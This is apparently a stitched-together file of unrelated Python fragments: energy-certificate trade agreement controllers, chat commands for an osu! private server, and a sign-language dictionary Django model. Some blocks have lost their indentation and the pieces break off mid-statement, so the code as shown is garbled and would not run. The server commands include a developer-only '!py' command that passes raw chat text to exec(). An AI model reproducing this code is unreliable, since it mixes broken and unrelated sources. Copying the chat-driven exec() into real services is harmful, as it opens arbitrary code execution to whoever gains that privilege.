        :param User user:
        :param Session session:
        :rtype: bool
        """
        agreement = AgreementQuery(session) \
            .has_public_id(request.public_id) \
            .belongs_to(user) \
            .one_or_none()

        if agreement:
            # Agreement must be cancelled and its transaction committed to
            # the database before updating transfer priorities, hence both
            # are executed in a transaction for themselves sequentially
            self.cancel_agreement(agreement.public_id, user)
            self.update_transfer_priorities(agreement.user_from)
            return True
        else:
            return False

    @atomic
    def cancel_agreement(self, public_id, user, session):
        """
        Cancels the agreement in its own database transaction.

        :param str public_id:
        :param User user:
        :param Session session:
        """
        AgreementQuery(session) \
            .has_public_id(public_id) \
            .belongs_to(user) \
            .one() \
            .cancel()

    @atomic
    def update_transfer_priorities(self, *args, **kwargs):
        """
        Re-calculates transfer priorities in its own database transaction
        (delegates to helpers.update_transfer_priorities).
        """
        update_transfer_priorities(*args, **kwargs)
class SetTransferPriority(Controller):
    """
    Reorders the user's accepted outbound agreements according to a
    provided list of public IDs (highest priority first), then lets the
    helper assign priorities to any agreements that were left out.
    """
    Request = md.class_schema(SetTransferPriorityRequest)

    @requires_login
    def handle_request(self, request, user):
        """
        :param SetTransferPriorityRequest request:
        :param User user:
        :rtype: bool
        """
        self.update_transfer_priorities(
            request.public_ids_prioritized, user)

        self.complete_priorities(user)

        return True

    @atomic
    def update_transfer_priorities(self, public_ids_prioritized, user, session):
        """
        :param list[str] public_ids_prioritized:
        :param User user:
        :param Session session:
        :rtype: bool
        """
        agreements = AgreementQuery(session) \
            .is_outbound_from(user) \
            .is_accepted()

        # Initially remove priority for all agreements
        agreements.update({TradeAgreement.transfer_priority: None})

        # Set priorities in the order they were provided
        for i, public_id in enumerate(public_ids_prioritized):
            agreements \
                .has_public_id(public_id) \
                .update({TradeAgreement.transfer_priority: i})

        return True

    @atomic
    def complete_priorities(self, *args, **kwargs):
        """
        Assigns priorities to any remaining agreements in its own
        transaction (delegates to helpers.update_transfer_priorities).
        """
        update_transfer_priorities(*args, **kwargs)
class SetFacilities(Controller):
    """
    Sets which of the user's facilities an agreement draws GGOs from.
    """
    Request = md.class_schema(SetFacilitiesRequest)

    @requires_login
    @atomic
    def handle_request(self, request, user, session):
        """
        :param SetFacilitiesRequest request:
        :param User user:
        :param sqlalchemy.orm.Session session:
        :rtype: bool
        """
        # NOTE(review): endpoint is intentionally disabled; everything
        # below this raise is currently unreachable.
        raise Exception('TODO')

        agreement = AgreementQuery(session) \
            .belongs_to(user) \
            .has_public_id(request.public_id) \
            .one_or_none()

        if agreement:
            agreement.facility_ids = [f.id for f in self.get_facilities(
                user, request.facility_public_ids, session)]
            return True
        else:
            return False

    def get_facilities(self, user, facility_public_ids, session):
        """
        Returns the user's facilities matching any of the given public IDs.

        :param User user:
        :param list[str] facility_public_ids:
        :param Session session:
        :rtype: list[Facility]
        """
        return FacilityQuery(session) \
            .belongs_to(user) \
            .has_any_public_id(facility_public_ids) \
            .all()
class FindSuppliers(Controller):
    """
    Finds active users able to supply GGOs matching the requested
    date range and minimum amount, via the account service.
    """
    Request = md.class_schema(FindSuppliersRequest)
    Response = md.class_schema(FindSuppliersResponse)

    @requires_login
    @atomic
    def handle_request(self, request, user, session):
        """
        :param FindSuppliersRequest request:
        :param User user:
        :param sqlalchemy.orm.Session session:
        :rtype: FindSuppliersResponse
        """
        suppliers = self.get_suppliers(request, user)

        return FindSuppliersResponse(
            success=True,
            suppliers=suppliers,
        )

    def get_suppliers(self, request, user):
        """
        :param FindSuppliersRequest request:
        :param User user:
        :rtype: list[User]
        """
        response = account.find_suppliers(
            token=user.access_token,
            request=acc.FindSuppliersRequest(
                date_range=request.date_range,
                min_amount=request.min_amount,
                min_coverage=0.8,
            )
        )

        # resolve subjects to local User rows, dropping unknown/inactive ones
        candidates = (self.get_user(sub) for sub in response.suppliers)
        return [u for u in candidates if u]

    @inject_session
    def get_user(self, subject, session):
        """
        :param str subject:
        :param sqlalchemy.orm.Session session:
        :rtype: User
        """
        query = UserQuery(session) \
            .is_active() \
            .has_sub(subject)
        return query.one_or_none()
# -- Proposals ---------------------------------------------------------------
class SubmitAgreementProposal(Controller):
    """
    Submits a new agreement proposal to another (active) user,
    and notifies that user by e-mail.
    """
    Request = md.class_schema(SubmitAgreementProposalRequest)
    Response = md.class_schema(SubmitAgreementProposalResponse)

    @requires_login
    @atomic
    def handle_request(self, request, user, session):
        """
        :param SubmitAgreementProposalRequest request:
        :param User user:
        :param Session session:
        :rtype: SubmitAgreementProposalResponse
        """
        counterpart = UserQuery(session) \
            .is_active() \
            .has_public_id(request.counterpart_id) \
            .exclude(user) \
            .one_or_none()

        if not counterpart:
            return SubmitAgreementProposalResponse(success=False)

        # The proposal direction decides who transfers to whom
        if request.direction == AgreementDirection.INBOUND:
            user_from = counterpart
            user_to = user
        elif request.direction == AgreementDirection.OUTBOUND:
            user_from = user
            user_to = counterpart
        else:
            raise RuntimeError('This should NOT have happened!')

        agreement = self.create_pending_agreement(
            request=request,
            user=user,
            user_from=user_from,
            user_to=user_to,
        )

        # flush so agreement.id is assigned before logging below
        session.add(agreement)
        session.flush()

        # (fixed lint F541: message had an f-prefix but no placeholders)
        logger.info('User submitted TradeAgreement proposal', extra={
            'subject': user.sub,
            'target': counterpart.sub,
            'agreement_id': agreement.id,
        })

        # Send e-mail to recipient of proposal
        send_invitation_received_email(agreement)

        return SubmitAgreementProposalResponse(success=True)

    def create_pending_agreement(self, request, user, user_from, user_to):
        """
        Builds a new TradeAgreement in PENDING state (not yet added to
        any session).

        :param SubmitAgreementProposalRequest request:
        :param User user:
        :param User user_from:
        :param User user_to:
        :rtype: TradeAgreement
        """
        agreement = TradeAgreement(
            user_proposed=user,
            user_from=user_from,
            user_to=user_to,
            state=AgreementState.PENDING,
            date_from=request.date.begin,
            date_to=request.date.end,
            reference=request.reference,
            amount=request.amount,
            unit=request.unit,
            amount_percent=request.amount_percent,
            technologies=request.technologies,
            limit_to_consumption=request.limit_to_consumption,
            proposal_note=request.proposal_note,
            facility_gsrn=request.facility_gsrn,
        )

        return agreement
class RespondToProposal(Controller):
"""
TODO
"""
Request = md.class_schema(RespondToProposalRequest)
@requires_login
@atomic
def handle_request(self, request, user, session):
"""
:param RespondToProposalRequest request:
:param User user:
:param Session session:
:rtype: bool
"""
agreement = AgreementQuery(session) \
.has_public_id(request.public_id) \
.is_awaiting_response_by(user) \
.one_or_none()
if not agreement:
return False
if request.accept:
# Accept proposal
self.accept_proposal(request, agreement, user, session)
else:
# Decline proposal
self.decline_proposal(agreement, user)
return True
    def accept_proposal(self, request, agreement, user, session):
        """
        Accepts the proposal: marks the agreement ACCEPTED, appends it to
        the end of the sender's transfer priority queue, applies any field
        overrides the accepting party is allowed to make, and kicks off a
        back-in-time consume pipeline for the sender.

        :param RespondToProposalRequest request:
        :param TradeAgreement agreement:
        :param User user:
        :param Session session:
        """
        agreement.state = AgreementState.ACCEPTED
        # new agreements go to the back of the sender's priority queue
        agreement.transfer_priority = self.get_next_priority(
            agreement.user_from, session)

        # overrides are applied only when the can_set_* rules allow it
        if request.technologies and self.can_set_technology(agreement):
            agreement.technologies = request.technologies

        if request.facility_gsrn and self.can_set_facilities(agreement, user):
            agreement.facility_gsrn = request.facility_gsrn

        if request.amount_percent and self.can_set_amount_percent(agreement, user):
            agreement.amount_percent = request.amount_percent

        logger.info(f'User accepted to TradeAgreement proposal', extra={
            'subject': user.sub,
            'agreement_id': agreement.id,
        })

        # NOTE(review): the pipeline period is padded by 2 days on each side
        # of the agreement period — presumably to catch measurements near
        # the boundaries; confirm with the pipeline owners.
        start_consume_back_in_time_pipeline(
            user=agreement.user_from,
            begin_from=datetime.fromordinal(agreement.date_from.toordinal()) - timedelta(days=2),
            begin_to=datetime.fromordinal(agreement.date_to.toordinal()) + timedelta(days=2),
        )

        # Send e-mail to proposing user
        send_invitation_accepted_email(agreement)
    def decline_proposal(self, agreement, user):
        """
        Declines the proposal and notifies the proposing user by e-mail.

        :param TradeAgreement agreement:
        :param User user:
        """
        agreement.decline_proposal()

        logger.info(f'User declined to TradeAgreement proposal', extra={
            'subject': user.sub,
            'agreement_id': agreement.id,
        })

        # Send e-mail to proposing user
        send_invitation_declined_email(agreement)
def can_set_technology(self, agreement):
| |
f'{t} was unsilenced.'
""" Admin commands
# The commands below are relatively dangerous,
# and are generally for managing players.
"""
@command(Privileges.Admin, hidden=True)
async def ban(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Ban a specified player's account, with a reason."""
    if len(msg) < 2:
        return 'Invalid syntax: !ban <name> <reason>'

    # find any user matching (including offline).
    t = await glob.players.get(name=msg[0], sql=True)
    if t is None:
        return f'"{msg[0]}" not found.'

    # staff members may only be managed by developers
    if t.priv & Privileges.Staff and not p.priv & Privileges.Dangerous:
        return 'Only developers can manage staff members.'

    await t.ban(p, ' '.join(msg[1:]))
    return f'{t} was banned.'
@command(Privileges.Admin, hidden=True)
async def unban(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Unban a specified player's account, with a reason."""
    if len(msg) < 2:
        # BUG FIX: usage text previously said '!ban'.
        return 'Invalid syntax: !unban <name> <reason>'

    # find any user matching (including offline).
    if not (t := await glob.players.get(name=msg[0], sql=True)):
        return f'"{msg[0]}" not found.'

    if t.priv & Privileges.Staff and not p.priv & Privileges.Dangerous:
        return 'Only developers can manage staff members.'

    # BUG FIX: the reason previously started at msg[2:], silently dropping
    # the first word of the reason; mirror !ban and use msg[1:].
    reason = ' '.join(msg[1:])

    await t.unban(p, reason)
    return f'{t} was unbanned.'
@command(Privileges.Admin, hidden=True)
async def alert(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Send a notification to all players."""
    if not msg:
        return 'Invalid syntax: !alert <msg>'

    # broadcast a notification packet to every online player
    glob.players.enqueue(packets.notification(' '.join(msg)))
    return 'Alert sent.'
@command(Privileges.Admin, hidden=True)
async def alertu(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Send a notification to a specified player by name."""
    if len(msg) < 2:
        return 'Invalid syntax: !alertu <name> <msg>'

    t = await glob.players.get(name=msg[0])
    if t is None:
        return 'Could not find a user by that name.'

    # everything after the name forms the notification text
    t.enqueue(packets.notification(' '.join(msg[1:])))
    return 'Alert sent.'
""" Developer commands
# The commands below are either dangerous or
# simply not useful for any other roles.
"""
@command(Privileges.Dangerous)
async def recalc(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Performs a full PP recalc on a specified map, or all maps."""
    if len(msg) != 1 or msg[0] not in ('map', 'all'):
        return 'Invalid syntax: !recalc <map/all>'

    score_counts = [] # keep track of # of scores recalced

    if msg[0] == 'map':
        # recalculate all scores on their last /np'ed map.
        if not p.last_np:
            return 'You must /np a map first!'

        ppcalc = await PPCalculator.from_id(p.last_np.id)
        if not ppcalc:
            return 'Could not retrieve map file.'

        await c.send(glob.bot, f'Performing full recalc on {p.last_np.embed}.')

        for table in ('scores_vn', 'scores_rx', 'scores_ap'):
            # fetch all scores from the table on this map
            # NOTE(review): only ranked (status = 2) std (mode = 0) scores
            # are recalced — confirm other modes are intended to be skipped.
            scores = await glob.db.fetchall(
                'SELECT id, acc, mods, max_combo, '
                'n300, n100, n50, nmiss, ngeki, nkatu '
                f'FROM {table} WHERE map_md5 = %s '
                'AND status = 2 AND mode = 0',
                [p.last_np.md5]
            )

            score_counts.append(len(scores))

            if not scores:
                continue

            for score in scores:
                # feed the stored score stats back into the pp calculator
                ppcalc.mods = Mods(score['mods'])
                ppcalc.combo = score['max_combo']
                ppcalc.nmiss = score['nmiss']
                ppcalc.acc = score['acc']

                pp, _ = await ppcalc.perform() # sr not needed

                await glob.db.execute(
                    f'UPDATE {table} '
                    'SET pp = %s '
                    'WHERE id = %s',
                    [pp, score['id']]
                )
    else:
        # recalculate all scores on every map
        if not p.priv & Privileges.Dangerous:
            return 'This command is limited to developers.'

        return 'TODO'

    # recap assumes exactly the three tables iterated above
    recap = '{0} vn | {1} rx | {2} ap'.format(*score_counts)

    return f'Recalculated {sum(score_counts)} ({recap}) scores.'
# NOTE: this is pretty useless since it doesn't switch anything other
# than the c[e4-6].ppy.sh domains; it exists on bancho as a tournament
# server switch mechanism, perhaps we could leverage this in the future.
@command(Privileges.Dangerous, hidden=True)
async def switchserv(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Switch your client's internal endpoints to a specified IP address."""
    if len(msg) != 1:
        return 'Invalid syntax: !switch <endpoint>'

    endpoint = msg[0]
    p.enqueue(packets.switchTournamentServer(endpoint))
    return 'Have a nice journey..'
# rest in peace rtx - oct 2020 :candle:
#@command(Privileges.Dangerous, hidden=True)
#async def rtx(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
# """Send an RTX packet with a message to a user."""
# if len(msg) != 2:
# return 'Invalid syntax: !rtx <name> <msg>'
#
# if not (t := await glob.players.get(name=msg[0])):
# return 'Could not find a user by that name.'
#
# t.enqueue(packets.RTX(msg[1]))
# return 'pong'
@command(Privileges.Dangerous, hidden=True)
async def debug(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Toggle the console's debug setting."""
    new_state = not glob.config.debug
    glob.config.debug = new_state
    return f"Toggled {'on' if new_state else 'off'}."
# TODO: this command is rly bad, it probably
# shouldn't really be a command to begin with..
# Maps role names (as typed in chat) to their privilege flags;
# unknown names yield None via the defaultdict factory.
str_priv_dict = defaultdict(lambda: None, {
    'normal': Privileges.Normal,
    'verified': Privileges.Verified,
    'whitelisted': Privileges.Whitelisted,
    'supporter': Privileges.Supporter,
    'premium': Privileges.Premium,
    'tournament': Privileges.Tournament,
    'nominator': Privileges.Nominator,
    'mod': Privileges.Mod,
    'admin': Privileges.Admin,
    'dangerous': Privileges.Dangerous
})
@command(Privileges.Dangerous, hidden=True)
async def setpriv(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Set privileges for a specified player (by name)."""
    if len(msg) < 2:
        return 'Invalid syntax: !setpriv <name> <role1 role2 role3 ...>'

    # accumulate the privilege bits for every role given
    priv = Privileges(0)
    for role in msg[1:]:
        mapped = str_priv_dict[role]
        if not mapped:
            return f'Not found: {role}.'
        priv |= mapped

    if not (t := await glob.players.get(name=msg[0], sql=True)):
        return 'Could not find user.'

    await t.update_privs(priv)
    return f"Updated {t}'s privileges."
# TODO: figure out better way :(
@command(Privileges.Dangerous, aliases=['men'], hidden=True)
async def menu_preview(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Temporary command to illustrate cmyui's menu option idea."""
    async def callback():
        # this is called when the menu item is clicked
        p.enqueue(packets.notification('clicked!'))

    # add the option to their menu opts & send them a button
    # (the returned id is embedded in a fake osu://dl link)
    opt_id = await p.add_to_menu(callback)
    return f'[osu://dl/{opt_id} option]'
# XXX: this actually comes in handy sometimes, i initially
# wrote it completely as a joke, but i might keep it in for
# devs.. Comes in handy when debugging to be able to run something
# like `!py return (await glob.players.get(name='cmyui')).status.action`
# or for anything while debugging on-the-fly..
@command(Privileges.Dangerous)
async def py(p: 'Player', c: Messageable, msg: Sequence[str]) -> str:
    """Execute arbitrary python code sent over chat (developers only)."""
    # SECURITY: this exec()s raw chat input. It is gated behind
    # Privileges.Dangerous on purpose — never widen that privilege check.
    # create the new coroutine definition as a string
    # with the lines from our message (split by '\n').
    lines = ' '.join(msg).split(r'\n')
    definition = '\n '.join(['async def __py(p, c, msg):'] + lines)

    try: # def __py(p, c, msg)
        exec(definition)

        loop = asyncio.get_event_loop()

        try: # __py(p, c, msg)
            # exec() bound __py into our locals(); fish it back out
            task = loop.create_task(locals()['__py'](p, c, msg))
            # shield() keeps the task alive past the 5s wait timeout
            ret = await asyncio.wait_for(asyncio.shield(task), 5.0)
        except asyncio.TimeoutError:
            ret = 'Left running (took >=5 sec).'
    except Exception as e:
        # code was invalid, return
        # the error in the osu! chat.
        ret = f'{e.__class__}: {e}'

    if ret is not None:
        return str(ret)
    else:
        return 'Success'
""" Multiplayer commands
# The commands below are specifically for
# multiplayer match management.
"""
@mp_commands.add(Privileges.Normal, aliases=['h'])
async def mp_help(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
    """Show information of all documented mp commands the player can access."""
    prefix = glob.config.command_prefix

    # include only documented commands the player has privileges for
    docs = [
        f'{prefix}mp {cmd.triggers[0]}: {cmd.doc}'
        for cmd in mp_commands.commands
        if cmd.doc and p.priv & cmd.priv
    ]

    return '\n'.join(docs)
@mp_commands.add(Privileges.Normal, aliases=['st'])
async def mp_start(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
    """Start the current multiplayer match, with any players ready."""
    if (msg_len := len(msg)) > 1:
        return 'Invalid syntax: !mp start <force/seconds>'

    if msg_len == 1:
        if msg[0].isdecimal():
            # !mp start <seconds>
            duration = int(msg[0])
            if not 0 < duration <= 300:
                return 'Timer range is 1-300 seconds.'

            # delayed start runs in a background task; the closure
            # captures p and m so it can re-check state when it fires
            async def delayed_start(wait: int):
                await asyncio.sleep(wait)

                if p not in m:
                    # player left match since :monkaS:
                    return

                await m.chat.send(glob.bot, 'Good luck!')
                m.start()

            asyncio.create_task(delayed_start(duration))
            return f'Match will start in {duration} seconds.'
        elif msg[0] not in ('force', 'f'):
            return 'Invalid syntax: !mp start <force/seconds>'
        # !mp start force simply passes through (to the m.start() below)
    else:
        # !mp start (no force or timer): require everyone to be ready
        if any(s.status == SlotStatus.not_ready for s in m.slots):
            return ('Not all players are ready '
                    '(use `!mp start force` to override).')

    m.start()
    return 'Good luck!'
@mp_commands.add(Privileges.Normal, aliases=['a'])
async def mp_abort(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
    """Abort the current in-progress multiplayer match."""
    if not m.in_progress:
        return 'Abort what?'
    # Reset everyone who was mid-play back to a not-ready state.
    m.unready_players(expected=SlotStatus.playing)
    m.in_progress = False
    # Tell clients to abort, then broadcast the refreshed match state.
    m.enqueue(packets.matchAbort())
    m.enqueue_state()
    return 'Match aborted.'
@mp_commands.add(Privileges.Admin, hidden=True)
async def mp_force(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
    """Force a player into the current match by name."""
    if len(msg) != 1:
        return 'Invalid syntax: !mp force <name>'

    target = await glob.players.get(name=' '.join(msg))
    if not target:
        return 'Could not find a user by that name.'

    await target.join_match(m, m.passwd)
    return 'Welcome.'
@mp_commands.add(Privileges.Normal)
async def mp_map(p: 'Player', m: 'Match', msg: Sequence[str]) -> str:
"""Set the current match's current map by id."""
if len(msg) != 1 or not msg[0].isdecimal():
return 'Invalid syntax: !mp map <beatmapid>'
if not (bmap := await Beatmap.from_bid(int(msg[0]))):
return 'Beatmap not | |
Finger Selection pattern stored in hsFingUnsel
try:
fieldSelectionMatch = FieldChoice.objects.filter(field__iexact='FingerSelection',
machine_value=self.hsFingUnsel)
except:
print('set_unselectedFingers failed for: ', self)
return
if not fieldSelectionMatch:
# no finger selection
return
# get the pattern, only one match is returned, in a list because of filter
fingerSelectionPattern = fieldSelectionMatch[0].english_name
self.ufT = 'T' in fingerSelectionPattern
self.ufI = 'I' in fingerSelectionPattern
self.ufM = 'M' in fingerSelectionPattern
self.ufR = 'R' in fingerSelectionPattern
self.ufP = 'P' in fingerSelectionPattern
return
def count_selected_fingers(self):
count_selected_fingers = 0
if self.fsT:
count_selected_fingers += 1
if self.fsI:
count_selected_fingers += 1
if self.fsM:
count_selected_fingers += 1
if self.fsR:
count_selected_fingers += 1
if self.fsP:
count_selected_fingers += 1
return count_selected_fingers
class Gloss(models.Model):
    class Meta:
        verbose_name_plural = "Glosses"
        # ordering: for Lemma View in the Gloss List View, we need to have glosses in the same Lemma Group sorted
        ordering = ['lemma']
        # Custom model permissions gating video updates, detail views,
        # CSV/ECV exports, and publishing/deletion of glosses.
        permissions = (('update_video', "Can Update Video"),
                       ('search_gloss', 'Can Search/View Full Gloss Details'),
                       ('export_csv', 'Can export sign details as CSV'),
                       ('export_ecv', 'Can create an ECV export file of Signbank'),
                       ('can_publish', 'Can publish signs and definitions'),
                       ('can_delete_unpublished', 'Can delete unpub signs or defs'),
                       ('can_delete_published', 'Can delete pub signs and defs'),
                       ('view_advanced_properties', 'Include all properties in sign detail view'),
                       )
    def __str__(self):
        # Human-readable representation: the gloss's ID-gloss text.
        return self.idgloss
def field_labels(self):
"""Return the dictionary of field labels for use in a template"""
d = dict()
for f in self._meta.fields:
try:
d[f.name] = _(self._meta.get_field(f.name).verbose_name)
except:
pass
return d
lemma = models.ForeignKey("LemmaIdgloss", null=True, on_delete=models.SET_NULL)
# languages that this gloss is part of
signlanguage = models.ManyToManyField(SignLanguage)
# these language fields are subsumed by the language field above
bsltf = models.NullBooleanField(_("BSL sign"), null=True, blank=True)
asltf = models.NullBooleanField(_("ASL sign"), null=True, blank=True)
# these fields should be reviewed - do we put them in another class too?
aslgloss = models.CharField(_("ASL gloss"), blank=True, max_length=50) # American Sign Language gloss
asloantf = models.NullBooleanField(_("ASL loan sign"), null=True, blank=True)
# loans from british sign language
bslgloss = models.CharField(_("BSL gloss"), max_length=50, blank=True)
bslloantf = models.NullBooleanField(_("BSL loan sign"), null=True, blank=True)
useInstr = models.CharField(_("Annotation instructions"), max_length=50, blank=True)
rmrks = models.CharField(_("Remarks"), max_length=50, blank=True)
########
# one or more regional dialects that this gloss is used in
dialect = models.ManyToManyField(Dialect)
blend = models.CharField(_("Blend of"), max_length=100, null=True, blank=True) # This field type is a guess.
blendtf = models.NullBooleanField(_("Blend"), null=True, blank=True)
compound = models.CharField(_("Compound of"), max_length=100, blank=True) # This field type is a guess.
comptf = models.NullBooleanField(_("Compound"), null=True, blank=True)
# Phonology fields
handedness = models.CharField(_("Handedness"), blank=True, null=True, choices=build_choice_list("Handedness"),
max_length=5)
handedness.field_choice_category = 'Handedness'
weakdrop = models.NullBooleanField(_("Weak Drop"), null=True, blank=True)
weakprop = models.NullBooleanField(_("Weak Prop"), null=True, blank=True)
domhndsh = models.CharField(_("Strong Hand"), blank=True, null=True, choices=build_choice_list("Handshape"),
max_length=5)
domhndsh.field_choice_category = 'Handshape'
subhndsh = models.CharField(_("Weak Hand"), null=True, choices=build_choice_list("Handshape"), blank=True,
max_length=5)
subhndsh.field_choice_category = 'Handshape'
# Support for handshape etymology
domhndsh_number = models.NullBooleanField(_("Strong hand number"), null=True, blank=True)
domhndsh_letter = models.NullBooleanField(_("Strong hand letter"), null=True, blank=True)
subhndsh_number = models.NullBooleanField(_("Weak hand number"), null=True, blank=True)
subhndsh_letter = models.NullBooleanField(_("Weak hand letter"), null=True, blank=True)
final_domhndsh = models.CharField(_("Final Dominant Handshape"), blank=True, null=True,
choices=build_choice_list("Handshape"), max_length=5)
final_domhndsh.field_choice_category = 'Handshape'
final_subhndsh = models.CharField(_("Final Subordinate Handshape"), null=True,
choices=build_choice_list("Handshape"), blank=True, max_length=5)
final_subhndsh.field_choice_category = 'Handshape'
locprim = models.CharField(_("Location"), choices=build_choice_list("Location"), null=True, blank=True,
max_length=20)
locprim.field_choice_category = 'Location'
final_loc = models.IntegerField(_("Final Primary Location"), choices=build_choice_list("Location"), null=True,
blank=True)
final_loc.field_choice_category = 'Location'
locVirtObj = models.CharField(_("Virtual Object"), blank=True, null=True, max_length=50)
locsecond = models.IntegerField(_("Secondary Location"), choices=build_choice_list("Location"), null=True,
blank=True)
locsecond.field_choice_category = 'Location'
initial_secondary_loc = models.CharField(_("Initial Subordinate Location"),
choices=build_choice_list("MinorLocation"), max_length=20, null=True,
blank=True)
initial_secondary_loc.field_choice_category = 'MinorLocation'
final_secondary_loc = models.CharField(_("Final Subordinate Location"), choices=build_choice_list("MinorLocation"),
max_length=20, null=True, blank=True)
final_secondary_loc.field_choice_category = 'MinorLocation'
initial_palm_orientation = models.CharField(_("Initial Palm Orientation"), max_length=20, null=True, blank=True)
final_palm_orientation = models.CharField(_("Final Palm Orientation"), max_length=20, null=True, blank=True)
initial_relative_orientation = models.CharField(_("Initial Interacting Dominant Hand Part"), null=True,
max_length=20, blank=True)
final_relative_orientation = models.CharField(_("Final Interacting Dominant Hand Part"), null=True, max_length=20,
blank=True)
domSF = models.CharField("Dominant hand - Selected Fingers",
choices=build_choice_list("DominantHandSelectedFingers"), null=True, blank=True,
max_length=5)
domSF.field_choice_category = 'DominantHandSelectedFingers'
domFlex = models.CharField("Dominant hand - Flexion", choices=build_choice_list("DominantHandFlexion"), null=True,
blank=True, max_length=5)
domFlex.field_choice_category = 'DominantHandFlexion'
oriChAbd = models.NullBooleanField(_("Abduction change"), null=True, blank=True)
oriChFlex = models.NullBooleanField(_("Flexion change"), null=True, blank=True)
inWeb = models.NullBooleanField(_("In the Web dictionary"), default=False)
isNew = models.NullBooleanField(_("Is this a proposed new sign?"), null=True, default=False)
excludeFromEcv = models.NullBooleanField(_("Exclude from ECV"), default=False)
inittext = models.CharField(max_length=50, blank=True)
morph = models.CharField(_("Morphemic Analysis"), max_length=50, blank=True)
# zero or more morphemes that are used in this sign-word (=gloss) #175
morphemePart = models.ManyToManyField('Morpheme', blank=True)
sedefinetf = models.TextField(_("Signed English definition available"), null=True,
blank=True) # TODO: should be boolean
segloss = models.CharField(_("Signed English gloss"), max_length=50, blank=True, null=True)
sense = models.IntegerField(_("Sense Number"), null=True, blank=True,
help_text="If there is more than one sense of a sign enter a number here, all signs with sense>1 will use the same video as sense=1")
sense.list_filter_sense = True
sn = models.IntegerField(_("Sign Number"),
help_text="Sign Number must be a unique integer and defines the ordering of signs in the dictionary",
null=True, blank=True, unique=True)
# this is a sign number - was trying
# to be a primary key, also defines a sequence - need to keep the sequence
# and allow gaps between numbers for inserting later signs
StemSN = models.IntegerField(null=True, blank=True)
relatArtic = models.CharField(_("Relation between Articulators"), choices=build_choice_list("RelatArtic"),
null=True, blank=True, max_length=5)
relatArtic.field_choice_category = 'RelatArtic'
absOriPalm = models.CharField(_("Absolute Orientation: Palm"), choices=build_choice_list("AbsOriPalm"), null=True,
blank=True, max_length=5)
absOriPalm.field_choice_category = 'AbsOriPalm'
absOriFing = models.CharField(_("Absolute Orientation: Fingers"), choices=build_choice_list("AbsOriFing"),
null=True, blank=True, max_length=5)
absOriFing.field_choice_category = 'AbsOriFing'
relOriMov = models.CharField(_("Relative Orientation: Movement"), choices=build_choice_list("RelOriMov"), null=True,
blank=True, max_length=5)
relOriMov.field_choice_category = 'RelOriMov'
relOriLoc = models.CharField(_("Relative Orientation: Location"), choices=build_choice_list("RelOriLoc"), null=True,
blank=True, max_length=5)
relOriLoc.field_choice_category = 'RelOriLoc'
oriCh = models.CharField(_("Orientation Change"), choices=build_choice_list("OriChange"), null=True, blank=True,
max_length=5)
oriCh.field_choice_category = 'OriChange'
handCh = models.CharField(_("Handshape Change"), choices=build_choice_list("HandshapeChange"), null=True,
blank=True, max_length=5)
handCh.field_choice_category = 'HandshapeChange'
repeat = models.NullBooleanField(_("Repeated Movement"), null=True, default=False)
altern = models.NullBooleanField(_("Alternating Movement"), null=True, default=False)
movSh = models.CharField(_("Movement Shape"), choices=build_choice_list("MovementShape"), null=True, blank=True,
max_length=5)
movSh.field_choice_category = 'MovementShape'
movDir = models.CharField(_("Movement Direction"), choices=build_choice_list("MovementDir"), null=True, blank=True,
max_length=5)
movDir.field_choice_category = 'MovementDir'
movMan = models.CharField(_("Movement Manner"), choices=build_choice_list("MovementMan"), null=True, blank=True,
max_length=5)
movMan.field_choice_category = 'MovementMan'
contType = models.CharField(_("Contact Type"), choices=build_choice_list("ContactType"), null=True, blank=True,
max_length=5)
contType.field_choice_category = 'ContactType'
phonOth = models.TextField(_("Phonology Other"), null=True, blank=True)
mouthG = models.CharField(_("Mouth Gesture"), max_length=50, blank=True)
mouthing = models.CharField(_("Mouthing"), max_length=50, blank=True)
phonetVar = models.CharField(_("Phonetic Variation"), max_length=50, blank=True, )
locPrimLH = models.CharField(_("Placement Active Articulator LH"), choices=build_choice_list("Location"), null=True,
blank=True, max_length=5)
locPrimLH.field_choice_category = 'Location'
locFocSite = models.CharField(_("Placement Focal Site RH"), null=True, blank=True, max_length=5)
locFocSiteLH = models.CharField(_("Placement Focal site LH"), null=True, blank=True, max_length=5)
initArtOri = models.CharField(_("Orientation RH (initial)"), null=True, blank=True, max_length=5)
finArtOri = models.CharField(_("Orientation RH (final)"), null=True, blank=True, max_length=5)
initArtOriLH = models.CharField(_("Orientation LH (initial)"), null=True, blank=True, max_length=5)
finArtOriLH = models.CharField(_("Orientation LH (final)"), null=True, blank=True, max_length=5)
# Semantic fields
iconImg = models.CharField(_("Iconic Image"), max_length=50, blank=True)
iconType = models.CharField(_("Type of iconicity"), choices=build_choice_list("iconicity"), null=True, blank=True,
max_length=5)
iconType.field_choice_category = 'iconicity'
namEnt = models.CharField(_("Named Entity"), choices=build_choice_list("NamedEntity"), null=True, blank=True,
max_length=5)
namEnt.field_choice_category = 'NamedEntity'
semField = models.CharField(_("Semantic Field"), choices=build_choice_list("SemField"), null=True, blank=True,
max_length=5)
semField.field_choice_category = 'SemField'
wordClass = models.CharField(_("Word class"), null=True, blank=True, max_length=5,
choices=build_choice_list('WordClass'))
wordClass.field_choice_category = 'WordClass'
wordClass2 = models.CharField(_("Word class 2"), null=True, blank=True, max_length=5,
choices=build_choice_list('WordClass'))
wordClass2.field_choice_category = 'WordClass'
derivHist = models.CharField(_("Derivation history"), choices=build_choice_list("derivHist"), max_length=50,
blank=True)
derivHist.field_choice_category = 'derivHist'
lexCatNotes = models.CharField(_("Lexical category notes"), null=True, blank=True, max_length=300)
valence = models.CharField(_("Valence"), choices=build_choice_list("Valence"), null=True, blank=True, max_length=50)
valence.field_choice_category = 'Valence'
concConcSet = models.CharField(_("Conception Concept Set"), null=True, blank=True, max_length=300)
# Frequency fields
tokNo = models.IntegerField(_("Number of Occurrences"), null=True, blank=True)
